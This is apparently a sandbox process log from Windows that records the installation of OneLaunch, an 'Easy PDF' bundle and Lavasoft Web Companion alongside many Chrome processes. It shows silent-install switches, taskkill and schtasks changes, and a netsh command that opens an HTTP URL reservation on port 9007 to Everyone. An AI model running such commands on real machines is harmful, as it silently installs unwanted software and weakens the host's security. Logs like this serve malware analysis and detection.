"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=6012 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6768 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=4972 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6744 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3444 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6104 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=5088 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5416 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5428 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\MinecraftInstaller.exe
"C:\Users\Admin\Downloads\MinecraftInstaller.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=7156 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7084 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3156 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5096 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6768 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe
"C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe"
C:\Users\Admin\AppData\Local\Temp\is-JN5DD.tmp\OneLaunch - Easy PDF_3x8a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JN5DD.tmp\OneLaunch - Easy PDF_3x8a5.tmp" /SL5="$1201F6,2173635,893952,C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=6664 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=6948 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6052 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1752 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe
"C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe" /PDATA=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 /LAUNCHER /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-PBFUT.tmp\OneLaunch - Easy PDF_3x8a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PBFUT.tmp\OneLaunch - Easy PDF_3x8a5.tmp" /SL5="$1E005E,2173635,893952,C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe" /PDATA=eyJ1dG1fdGVybSI6Ind3dy53aXpjYXNlLmNvbSIsImdjbGlkIjoiRUFJYUlRb2JDaE1JcDR1QWwtS3FnQU1WRnZVWkNoMVlUZ0h5RUFFWUFTQUFFZ0t4ZVBEX0J3RSIsInV0bV9jYW1wYWlnbiI6IjE3NDI4MDEwMDg2IiwiZGlzdGluY3RfaWQiOiI5ZDcwMmU5MS1jYTQ3LTRhNTEtOTk3OS04NDM3Y2ZhNmZkNzEiLCJ1dG1fbWVkaXVtIjoiMTQ3OTYxMTc0NzI5IiwicHJvZmlsZSI6InBkZiIsInR5cGUiOiJwZGZyZWFkZXIiLCJ1YSI6IkNocm9tZSIsIndoaXRlbGFiZWwiOiJlYXN5cGRmIiwidXRtX3NvdXJjZSI6Im9oLWdkbiIsInV0bV9jb250ZW50IjoiNjY2MTY3NzQ3OTQ2IiwiaW5zdGFsbF90aW1lIjoxNjkwMzE5MzQ4LCJkZWZhdWx0X2Jyb3dzZXIiOiJNU0VkZ2VIVE0iLCJpbml0aW5hbF92ZXJzaW9uIjoiNS4xNy40LjAiLCJwYWNrYWdlZF9icm93c2VyIjoiTm9uZSIsInNwbGl0IjoiYiIsIm9sX3BsdXNfdjIiOmZhbHNlLCJub19zcGxpdCI6ZmFsc2UsInNwbGl0MiI6ImEiLCJzZXJ2ZXJfc2lkZV9zcGxpdF8yM18wNl9yb3VuZGVkX3NlYXJjaGJhciI6InZhcmlhdGlvbiIsInNwbGl0XzIyXzEyX21vcmVfZWR1Y2F0aW9uYWxfbWluaXByb21wdHMiOiJjb250cm9sIiwic3BsaXRfMjNfMDZfcHJlcGluX2xhYmVsbGVkX2FtYXpvbl9hcHAiOiJ2YXJpYXRpb24iLCJlbmNvZGVkX3NwbGl0cyI6IjAwMCJ9 /LAUNCHER /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup_3x8a5.exe
"C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup_3x8a5.exe" /PDATA=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
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=6608 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=5596 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp" /SL5="$9020E,98167063,893952,C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup_3x8a5.exe" /PDATA=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
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im onelaunch.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im chromium.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im onelaunchtray.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=6036 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5480 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5096 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7204 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1136 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7260 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\Setup_WebCompanion.exe
"C:\Users\Admin\Downloads\Setup_WebCompanion.exe"
C:\Users\Admin\AppData\Local\Temp\7zS477B1A6F\WebCompanionInstaller.exe
.\WebCompanionInstaller.exe --savename=Setup_WebCompanion.exe --partner=IN220101 --nonadmin --direct --tych --campaign=18022583703 --version=11.904.0.689
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=1048 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=6244 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3340 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6976 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh http add urlacl url=http://+:9007/ user=Everyone
C:\Windows\system32\schtasks.exe
"schtasks" /Delete /TN "OneLaunchLaunchTask" /F
C:\Windows\system32\schtasks.exe
"schtasks" /Delete /TN "ChromiumLaunchTask" /F
C:\Windows\SysWOW64\netsh.exe
netsh http add urlacl url=http://+:9007/ user=Everyone
C:\Windows\system32\schtasks.exe
"schtasks" /Delete /TN "OneLaunchUpdateTask" /F
C:\Windows\system32\schtasks.exe
"schtasks" /delete /tn OneLaunchLaunchTask /f
C:\Windows\system32\schtasks.exe
"schtasks" /delete /tn ChromiumLaunchTask /f
C:\Windows\system32\schtasks.exe
"schtasks" /delete /tn OneLaunchUpdateTask /f
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe" /l /startedFrom=installer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe
"C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe" --install --geo=
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --start-maximized --tab-trigger=Launch
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\OneLaunch\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\OneLaunch\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\OneLaunch\User Data\Crashpad" --annotation=plat=Win32 --annotation=prod=OneLaunch --annotation=ver=112.1.0 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x6cb2f098,0x6cb2f0a8,0x6cb2f0b4
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\OneLaunch\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\OneLaunch\User Data\Crashpad" --annotation=plat=Win32 --annotation=prod=OneLaunch --annotation=ver=112.1.0 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2a8,0x2d8,0x59adb0,0x59adc0,0x59adcc
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:2
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3040 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=2532 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=3356 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3248 -ip 3248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 2720
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=7632 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7696 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\program files\google\chrome\application\chrome.exe
"C:\program files\google\chrome\application\chrome.exe" "https://geteasypdf.com/pdf/thanks/?data=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"
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4168 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --instant-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4192 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\program files\google\chrome\application\chrome.exe
"C:\program files\google\chrome\application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7fff9a469758,0x7fff9a469768,0x7fff9a469778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5912 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=7944 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5096 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunchtray.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunchtray.exe"
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5040 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5020 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5520 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3248 -ip 3248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 2720
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5672 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5516 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5944 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5552 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5824 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=7324 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6384 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=8140 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6568 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe
"C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe" --afterinstall
C:\Program Files\Google\Chrome\Application\chrome.exe
